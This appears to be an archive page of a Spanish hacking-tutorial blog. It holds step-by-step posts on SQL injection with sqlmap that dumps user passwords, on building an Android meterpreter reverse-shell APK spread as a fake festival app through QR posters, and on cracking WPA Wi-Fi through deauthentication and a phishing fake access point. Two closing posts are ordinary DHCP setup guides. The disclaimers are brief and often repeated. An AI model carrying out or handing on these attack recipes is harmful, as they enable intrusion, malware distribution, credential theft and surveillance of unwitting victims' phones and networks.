21 de mayo de 2015

Kali Linux - II Inyección SQL con SQLMap

davidsora
Según Wikipedia Inyección SQL es un método de infiltración de código intruso que se vale de una vulnerabilidad informática presente en una aplicación en el nivel de validación de las entradas para realizar operaciones sobre una base de datos...

La inyección SQL esta en la cima de el delito en la red, por el valor de las bases de datos que están en la red (empresas,tiendas,banca online...) ahí se almacenan todo tipo de credenciales, desde nombres de usuario hasta números bancarios. Como sabréis, las inyecciones SQL en algunos casos se pueden realizar desde el propio navegador, inyectando caracteres en una consulta desde la pagina web hasta la base de datos,  que generen un tipo de error, esa sera la parte del código SQL vulnerable, es decir inyectaremos código SQL intruso contra ese parámetro "mal configurado" .

ESTA PRACTICA FUE REALIZADA EN UN ENTORNO CONTROLADO, CON DISPOSITIVOS PROPIOS, RECORDAR QUE ACCEDER Y ROBAR INFORMACIÓN AJENA ES UN DELITO PENALIZADO Y PERSEGUIDO POR LOS CUERPOS DE SEGURIDAD DEL ESTADO, RECOMIENDO REALIZAR ESTAS PRACTICAS EN ENTORNOS CONTROLADOS - See more at: http://www.davidsora.es/#sthash.mnzlqMMu.dpuf
ESTA PRACTICA FUE REALIZADA EN UN ENTORNO CONTROLADO, CON DISPOSITIVOS PROPIOS, RECORDAR QUE ACCEDER Y ROBAR INFORMACIÓN AJENA ES UN DELITO PENALIZADO Y PERSEGUIDO POR LOS CUERPOS DE SEGURIDAD DEL ESTADO, RECOMIENDO REALIZAR ESTAS PRACTICAS EN ENTORNOS CONTROLADOS - See more at: http://www.davidsora.es/#sthash.mnzlqMMu.dpuf
ESTA PRACTICA FUE REALIZADA EN UN ENTORNO CONTROLADO, CON DISPOSITIVOS PROPIOS, RECORDAR QUE ACCEDER Y ROBAR INFORMACIÓN AJENA ES UN DELITO PENALIZADO Y PERSEGUIDO POR LOS CUERPOS DE SEGURIDAD DEL ESTADO, RECOMIENDO REALIZAR ESTAS PRACTICAS EN ENTORNOS CONTROLADOS  - See more at: http://www.davidsora.es/#sthash.mnzlqMMu.dpuf
ESTA PRACTICA FUE REALIZADA EN UN ENTORNO CONTROLADO, CON DISPOSITIVOS PROPIOS, RECORDAR QUE ACCEDER Y ROBAR INFORMACIÓN AJENA ES UN DELITO PENALIZADO Y PERSEGUIDO POR LOS CUERPOS DE SEGURIDAD DEL ESTADO, RECOMIENDO REALIZAR ESTAS PRACTICAS EN ENTORNOS CONTROLADOS  - See more at: http://www.davidsora.es/#sthash.mnzlqMMu.dpuf
ESTA PRACTICA FUE REALIZADA EN UN ENTORNO CONTROLADO, CON DISPOSITIVOS PROPIOS, RECORDAR QUE ACCEDER Y ROBAR INFORMACIÓN AJENA ES UN DELITO PENALIZADO Y PERSEGUIDO POR LOS CUERPOS DE SEGURIDAD DEL ESTADO, RECOMIENDO REALIZAR ESTAS PRACTICAS EN ENTORNOS CONTROLADOS  - See more at: http://www.davidsora.es/#sthash.mnzlqMMu.dpuf
ESTA PRACTICA FUE REALIZADA EN UN ENTORNO CONTROLADO, CON DISPOSITIVOS PROPIOS, RECORDAR QUE ACCEDER Y ROBAR INFORMACIÓN AJENA ES UN DELITO PENALIZADO Y PERSEGUIDO POR LOS CUERPOS DE SEGURIDAD DEL ESTADO, RECOMIENDO REALIZAR ESTAS PRACTICAS EN ENTORNOS CONTROLADOS  - See more at: http://www.davidsora.es/#sthash.mnzlqMMu.dpuf
STA PRACTICA FUE REALIZADA EN UN ENTORNO CONTROLADO, CON DISPOSITIVOS PROPIOS, RECORDAR QUE ACCEDER Y ROBAR INFORMACIÓN AJENA ES UN DELITO PENALIZADO Y PERSEGUIDO POR LOS CUERPOS DE SEGURIDAD DEL ESTADO, RECOMIENDO REALIZAR ESTAS PRACTICAS EN ENTORNOS CONTROLADOS  - See more at: http://www.davidsora.es/#sthash.mnzlqMMu.dpuf icho esto, manos a la obra, comenzamos arrancando la maquina con Kali Linux instalado, recordar que SQLMap está disponible para otros sistemas y distribuciones.
Antes de comenzar, buscaremos una pagina vulnerable, podemos usar dorks de google tipo :  inurl=.php?id=   o hacerlo manualmente, Ejemplo:
http://www.prueba.com/tienda.php?id=abc

La linea de arriba es la consulta normal, abajo inyectamos una comilla para poder ver si es vulnerable.
http://www.prueba.com/tienda.php?id='

En caso de ser vulnerable debería mostrar por pantalla un error. Una vez tengamos la pagina vulnerable arrancamos SQLMap, la herramienta SQLMap la podéis encontrar en Aplicaciones - Análisis de vulnerabilidades - valuación de bases de datos - sqlmap, en esta "guia" utilizaremos parámetros básicos ya que SQLmap ofrece muchas posibilidades, desde evadir IDS/Firewall a utilizar la red tor como escudo. Ahora arrancamos la aplicación e introducimos la siguiente linea.

sqlmap -u "http://www.prueba.com/index.php?mod=noticias&tipo=completa&idNoticia=76" --dbs --dbms=mysql

con esta orden, inyectaremos consultas SQL en el parámetro idNoticia, el cual sabíamos que era vulnerable, el --dbs es para visualizar las bases de datos, el --dbms es para seleccionar el tipo de motor de consultas y colocamos =mysql. Una vez ejecutado, nos mostrara las bases de datos disponibles, como podéis observar inyecto el código en el parámetro idNoticia, el cual sabíamos que era vulnerable .

Ahora que podemos ver las bases de datos, vamos a buscar las tablas que puedan ser de interés,

sqlmap -u "http://www.prueba.com/index.php?mod=noticias&tipo=completa&idNoticia=76" -D baseDatos --tables

Al introducir la linea anterior observamos que nos muestra las tablas dentro de la base de datos seleccionada, por motivos obvios la url del post no es la utilizada realmente en la practica, ya que la practica real fue realizada contra una tienda online.

En la siguiente linea, vamos a ver que contienen las tablas que nos interesen, es decir, ver las columnas que contiene cada tabla

sqlmap -u "http://www.prueba.com/index.php?mod=noticias&tipo=completa&idNoticia=76" -D baseDatos -T usuarios --columns

Observamos listado de columnas, podemos ver que contiene usuarios, contraseñas , teléfonos y demás datos sensibles, ahora solo queda visualizar la columna deseada, para ello seleccionamos las columnas con -C y finalizamos con --dump.

sqlmap -u "http:/prueba.com/index.php?mod=noticias&tipo=completa&idNoticia=76" -D baseDatos -T usuarios -C passwd,tipoUsuaria  --dump

Ahora nos mostrará las columnas que escogimos anteriormente, es decir las contraseñas y los tipos de usuario, con esto pretendía obtener los accesos de administrador y contraseña de la pagina web.
Ya tenemos las credenciales de todos los usuarios registrados en la tienda, tanto del administrador como de los usuarios normales.

A partir de aquí, todo depende de hasta donde queráis llegar, como siempre recomiendo realizarlo en entornos controlados, ya que una practica de este tipo os puede llevar a incurrir en un delito.

2 de marzo de 2015

Kali Linux - I Reverse TCP Android LVL0 con Metasploit & SET

davidsora


Como ya sabéis, metasploit es la herramienta de explotación de vulnerabilidades por excelencia, en esta ocasión vamos a "atacar" dispositivos móviles personales con sistema Android.

El escenario es el siguiente, el equipo atacante (Kali Linux), un servidor FTP para que nuestras victimas puedan descargar fácilmente la App y las victimas (terminales Android).

Comencemos! es esencial tener instalado metasploit, en mi caso la distribución Kali linux lo trae integrado, así que procedemos, empezamos con el payload.

Crear el payload es muy sencillo, basta con  introducir esta linea en una terminal.

msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.11 LPORT=8888 R> fiestasbilbao.apk

Esto indica lo siguiente, la App lleva la instrucción de iniciar una sesión meterpreter contra 192.168.1.11 por el puerto 8888, la R indica que la salida es en formato .apk, escogemos el nombre e introducimos la orden, tardará un poco, una vez finalice podremos observar nuestra App en el escritorio, previamente habremos hecho un cd Desktop para crear el payload en el escritorio, de lo contrario me parece que se crea en el directorio Home, ahí tenéis una imagen del proceso anterior




Una vez terminado el payload, arrancamos el metasploit, cuando arranque el script ejecutamos msfupdate, por si lo tenéis sin actualizar.

Ahora escogemos el exploit, introducimos use exploit/multi/handler , después toca escoger el payload
set payload android/meterpreter/reverse_tcp y por ultimo el local host (192.168.1.11) y el puerto local (8888) e introducimos por ultimo el comando exploit como muestra la siguiente imagen

Una vez ejecutada la orden exploit, metasploit se queda a la espera de que algún "usuario" instale y ejecute nuestra aplicación.


I. Recolectando clientes 

Ahora ya tenemos nuestra aplicación, pero necesitamos usuarios, en este caso dispuestos a pasar una semana en las fiestas de bilbao, como pudisteis observar en el payload el nombre que escogí fue fiestasbilbao.apk, ahora interviene nuestra imaginación, la habilidad con la edición de imágenes y la herramienta S.E.T  (Social Engineering Toolkit) esta herramienta también viene incluida en Kali linux, aquí tenéis una pequeña guia de como crear un QR con SET . Recordar que antes de crear el código debéis tener alojada la aplicación en algún servidor FTP ya sea propio o de alojamiento gratuito Una vez tengamos el código QR creado que nos dirige hacia un servidor FTP, donde esta alojada nuestra aplicación esperando a ser descargada.

Bien, ahora toca darle imaginación al asunto... creando un cartel que será distribuido por redes sociales, impreso en locales y demás. (5 minutos empleé en el cartel, ¿no esta tan mal no?)
Imagen creada con Photoshop Integrando el QR para descargar la APP

Ahora todo depende de la promoción que recibió el cartel, fijo todos quieren un acceso VIP a los recintos ;)

Bien ! al parecer nuestro primer "usuario" descargó e instalo la App Oficial !

Finalmente tenemos la sesión meterpreter activada y esperando a que le deis uso, introduciendo help en la linea de meterpreter, nos mostrará todo lo que podemos hacer en el dispositivo.

En mi caso decidí probar el check root (Si el teléfono esta rooteado y cae en esta "trampa" el daño puede ser de una magnitud mucho mayor) y la localización.

Como podéis observar el check_root y geolocate, he de decir este ultimo tiene una precisión de 5m de error (en mi caso)
Ahora solo queda ver hasta donde sois capaces de llegar... desde dumpear la lista de contactos, llamadas, imágenes ... hasta la "valiosa" base de datos de WhatsApp .

AQUÍ tenéis un enlace de interés relacionado con esta practica .

 Recordar si tenéis alguna duda o alguna pregunta dejarla en comentarios! 

Podéis seguirme en twitter @jdavidsora

ESTA PRACTICA FUE REALIZADA EN UN ENTORNO CONTROLADO, CON DISPOSITIVOS PROPIOS, RECORDAR QUE ACCEDER Y ROBAR INFORMACIÓN AJENA ES UN DELITO PENALIZADO Y PERSEGUIDO POR LOS CUERPOS DE SEGURIDAD DEL ESTADO, RECOMIENDO REALIZAR ESTAS PRACTICAS EN ENTORNOS CONTROLADOS 

11 de febrero de 2015

Wifislax 4.9 - II Conseguir acceso a redes WPA/WPA2-PSK con Linset

davidsora



Buenas a todos ! esta es la segunda entrada de Wifislax, conseguir acceso a redes WPA/WPA2-PSK con una herramienta incluida en nuestra distribución para auditar redes inalámbricas: LINSET.

LINSET es un script con  un objetivo claro, conseguir acceso a redes sin necesidad de diccionarios ni fuerza bruta, es un tipo de "ingeniería social" su funcionamiento es el siguiente.

1. Escanea la red.
2. Selecciona la red.
3. Busca handshake (se puede usar sin handshake)
4. Se elige una de las varias interfaces web en diferentes idiomas
5. Se monta un AP Falso imitando al original
6. Se crea un servidor DHCP sobre el AP Falso
7. Se crea un servidor DNS para redirigir todas las peticiones al Host (Equipo Atacante)
8. Se lanza el servidor web con la interfaz seleccionada (Idioma escogido en el punto 4)
9. Se lanza el mecanismo para comprobar la validez de las contraseñas que se van a introducir
10. Se desautentifica a todos los usarios de la red, esperando que se conecten al AP Falso y tengan que "introducir su contraseña por motivos de seguridad".
11. Se detiene el ataque tras la comprobación correcta de la contraseña.


RECORDAR QUE ESTAS PRACTICAS SON PARA REALIZARLAS EN VUESTRAS PROPIAS REDES INALÁMBRICAS, EN NINGÚN CASO DEBE REALIZARSE EN UNA RED AJENA, ESTARÍAMOS COMETIENDO UN DELITO 

Comencemos! para acceder a LINSET seguir la siguiente ruta INICIO/WIFISLAX/WPA/LINSET


Se nos abrirá el script y comprobara la versión, en caso de no estar actualizado procederá automáticamente a actualizar el script



En el paso numero dos seleccionamos la interfaz que vamos a utilizar en este caso wlan0



Ahora escogemos si queremos escanear un canal en concreto o todos los canales, en mi caso escogí la opcion 1.


Se iniciara la búsqueda de redes disponibles, para parar la búsqueda CRTL+C .

Una vez detenida la búsqueda, deberemos escoger que red vamos a "atacar" en este caso Mi red es la red Nº2 .


Ahora nos pedirá escoger el modo en el cual funcionara nuestro AP Falso , escogemos Hostpad, el airbase-ng se utiliza para algunos chipset que no funcionan bien con el hostpad



Acto seguido el script nos preguntara si queremos utilizar un handshake previamente capturado, en este caso como no lo tenemos pulsamos enter para continuar.


Ahora debemos escoger el tipo de comprobación del handshake, yo siempre utilizo aircrack-ng, de momento no he tenido ningún problema


Después de seleccionar el tipo de comprobación de handhsake procederemos a escoger la forma de desautenticar a los clientes para poder obtener el handshake podemos escoger desautenticacion masiva / mdk3 o desautenticacion  especifica, cuantos mas clientes mas posibilidades de obtener el handshake así que seleccionaremos la primera opción.



Ahora el script procederá a desautenticar a los clientes de la red seleccionada anteriormente, esperando a la re-conexion de los mismos para obtener el handshake, aunque en la ventana de LINSET aparezca "Sin Handshake" debéis fijaros en la ventana de la derecha arriba, donde indica que si se ha capturado el handshake, para detener la busqueda del handshake pulsamos CRTL+C, y seleccionamos la opción numero 1.


LINSET como habéis leído utiliza una inferaz WEB para solicitar amablemente las credenciales de la red, seleccionamos la primera opción

en este paso escogeremos en que idioma se mostrara la web, en mi caso selecciono la opción numero 2.


Ahora comienza el "ataque" podéis observar que se abren una serie de ventanas con diferentes utilidades, el servidor DHCP, el FakeDNS y el mdk3 que cada 3 segundos desautentica clientes de la red original para obligarlos a conectarse a la red creada por LINSET


Para hacer completo el tutorial introduje mi teléfono en la red duplicada y podemos observar como se le asigna una direccion IP y como redirige todo el trafico hacia la pagina web que nos pedirá la clave de la red.


Aquí podemos observar como aparecen las dos redes, la red original y el falso AP con el mismo nombre, como podéis ver el servidor DHCP me esta dando una direccion IP.

Una vez estamos dentro de la red del falso AP intentamos navegar hacia cualquier dirección WEB, y es cuando el ataque esta a punto de finalizar, aquí podéis observar que la interfaz esta muy lograda, así que "por razones de seguridad procedemos a introducir nuestra clave WPA".


Finalmente, si la clave es correcta la "víctima del ataque" visualizara esto

Mientras nosotros, visualizaremos lo siguiente.


Aquí finaliza el ataque, en caso de que la clave introducida sea correcta, el propio script al terminar se cierra, mostrando solo la captura anterior, con la comprobacion de la clave.

Espero que os hay gustado y sido de gran utilidad.

Pronto volveré a la actividad con mas artículos relacionados con la seguridad informática y seguridad de redes inalámbricas.

Si tenéis alguna duda o alguna pregunta dejarla en comentarios!


24 de septiembre de 2014

Wifislax 4.9 - I Conseguir acceso a redes WiFi protegidas con WPA/WPA2-PSK AirCrack

davidsora


En esta practica se ha usado la ultima versión de Wifislax la 4.9  la podéis descargar AQUÍ , también han sido necesarios un pendrive para acceder al live CD y una Antena Alfa Network AWUS036H

Para los que empezáis de cero, necesitaremos una ISO de WIfislax  un dispositivo de almacenamiento USB y ganas de probar la seguridad de nuestra red WiFi...


 Comenzamos!  creamos desde un sistema Windows el live CD de Wifislax con Yumi. Ejecutamos Yumi y seleccionamos la distribución o sistema para hacerla booteable desde el pendrive, acto seguido selecionamos la ISO de Wifislax y le damos a crear, podemos escoger los parámetros, como formatear el pendrive antes de crear el arranque y demás. Para arrancar desde el un dispositivo de almacenamiento USB es necesario que nuestra placa base soporte el arranque desde USB, en mi caso con habilitarlo desde la bios y pulsar F12 en el arranque ya me permite bootear un sistema de almacenamiento USB,al arrancar el pendrive nos aparecerá el menú de yumi, nos da dos opciones , arrancar el disco duro principal o seleccionar otros sistemas y herramientas, escogemos la segunda opcion y pulsamos Enter en Wifislax 4.9, escogemos el kernel por defecto y el escritorio KDE.

Tras arrancar realizar las comprobaciones y ajustar el sistema a nuestro equipo cargara el escritorio por defecto de Wifislax, una vez terminado seguimos con el siguiente paso, Conectamos la Antena Wifi USB , en este caso la ya mencionada Alfa AWUS036 el propio sistema instalará el driver correspondiente y abajo en icono de red nos saldrán las redes wifi disponibles.


Ahora procedemos con la practica - Conseguir acceso a una red inalámbrica protegida con seguridad WPA-PSK


RECORDAR QUE ESTAS PRACTICAS SON PARA REALIZARLAS EN VUESTRAS PROPIAS REDES INALÁMBRICAS, PARA PROBAR LA SEGURIDAD DE LAS MISMAS


para acceder a airoscropt wifislax accederemos por la siguiente "ruta"


Inicio - Wifislax- Suite aircrack-ng - airoscript wifislax  


Una vez ejecutado el script nos deja seleccionar la interfaz que utilizaremos para el ataque, escogemos wlan0   , ahora nos pregunta si queremos activar el modo monitor, y tambien que driver queremos utilizar, con esta antena seleccionamos 1, SI y Compat Wireless pulsamos enter y nos mostrará el menu de airoscript.


     1) Escanear                      -Buscar Objetivos                 

     2) Seleccionar                  -Seleccionar Objetivo             
     3) Ataques                       -Atacar Objetivo                  
     4) Crackear                      -Menu Crackear                    
     5) Auto                              -Buscar Key Automaticamente       
     6) Autenticar                    -Cliente Falso en Objetivo        
     7) Desautenticar              -Desautenticar del Objetivo       
     8) Inyección                      -Menu de Inyección                
     9) Opciones Avanzadas   -Utilidades Varias                
   10) Salir                              -Cerrar Airoscript   

Seleccionamos escanear objetivos, y dentro de la opcion 1, escogemos la opción 6, escanear WPA-WPA2, después seleccionamos la opcion 1, Todos los canales y nos mostrará todas las redes disponibles con WPA/WPA2  - PSK




 Aquí, tenemos una imagen de las redes que hemos conseguido localizar, a continuación cerramos la ventana y nos devolverá al menú de airoscript y seleccionamos la opcion 2, Seleccionar Objetivo aquí escogeréis la red inalámbrica de la cual deseáis poder acceder. seleccionamos la red y después pulsamos "1" , seleccionar cliente, yo aqui utilicé la opción Nº3, des-autenticar todos los clientes del AP y re-detectar los clientes.


Aquí lo que realiza es una "expulsión" de todos los clientes obligandolos a re-conectarse a la red, en el proceso de autenticació se obtiene el Handshake, el handshake contiene la clave WPA del punto de acceso, ahora procederemos a desencriptar la clave.


Para poder desencriptar el handshake es necesario abrir otra herramienta disponible en wifislax, Wpa-Gui-Qt (Crack guiado de WPA)  para acceder a ella repetimos la búsqueda.



Inicio- Wifislax- WPA- Wpa-Gui-Qt

Ahora se abrirá el programa


Seleccionamos el diccionario con el que tenemos que probar las posibles contraseñas, por internet se pueden conseguir muy buenos diccionarios creados por pentesters en los que se incluyen millones de palabras y posibles contraseñas.


Y seleccionamos el handshake, que queda guardado en la siguiente ruta:



/root/swireless/airoscript/capturas/ 

y escogemos nuestra captura que sera algo parecido a



XX:XX:XX:XX:XX:XX-XX.cap

ahora solo toca esperar a que el aircrack de con la clave de la red WiFi





Espero que os haya sido de utilidad y recordar cualquier duda dejarla en comentarios !



Otras entradas de interés



16 de octubre de 2013

Instalar Servidor DHCP en W2008 R2

davidsora
Instalar Servidor DHCP en Windows 2008 R2

Tras terminar la instalación del Sistema vamos a Administrar el Servidor 
Hacemos clic derecho sobre Funciones y Agregar Función
Le damos a siguiente > Funciones de Servidor > Marcamos DHCP>  Configuramos el dominio, IP(V4) y DNS > Escogemos los ambitos >Configuramos IPV6 >  Configuramos la autorizacion del servidor DHCP  y le damos a Instalar 
La dirección IP cada servidor será desde 10.255.101.101 a 10.255.115.115
Puerta de enlace: 10.255.255.254
Servidores DNS: 80.58.61.250  y  80.58.61.250
Ámbitos:
               de 10.255.101.220   a   10.255.101.240
               de 10.255.102.220   a   10.255.102.240
               de 10.255.115.220   a   10.255.115.240


7 de octubre de 2013

Instalar servidor DHCP en Ubuntu 12.04

davidsora


Para instalar el servidor dentro de Ubuntu 12.04 usaremos este comando y ejecutaremos desde la Terminal(crtl + F)

sudo apt-get install isc-dhcp-server


a continuación crearemos un backup de el archivo de configuracion del servidor DHCP


sudo cp /etc/dhcp/dhcpd.conf /etc/dhcp/dhcpd.seg


despues de hacer el backup y procederemos a editar el contenido, colocando la siguiente configuración.



# contenido básico
default-lease-time 650;

max-lease-time 79520;

option subnet-mask 255.255.255.0;
option broadcast-address 192.168.1.255;
option routers 192.168.1.1;

subnet 192.168.10.0 netmask 255.255.255.0
{
   range 192.168.1.142 192.168.1.146;
}

Una vez copiado esto, procederemos a cambiar el numero de subnet, 192.168.10.0 por 192.168.1.0 y ajustaremos el rango de direcciones IP que queremos servir, en mi caso de el 192.168.1.142 al 192.168.1.46 y el servidor DHCP estará completamente terminado y listo para funcionar, en el siguiente paso podemos observar como se mira el Status del server, se inicia y se detiene con unos comandos


Status > sudo service isc-dhcp-server status
Iniciar el servidor DHCP > sudo service isc-dhcp-server start
Detener el servidor DHCP > sudo service isc-dhcp-server stop

Una vez terminados todos estos pasos, el servidor ofrecerá servicio DHCP.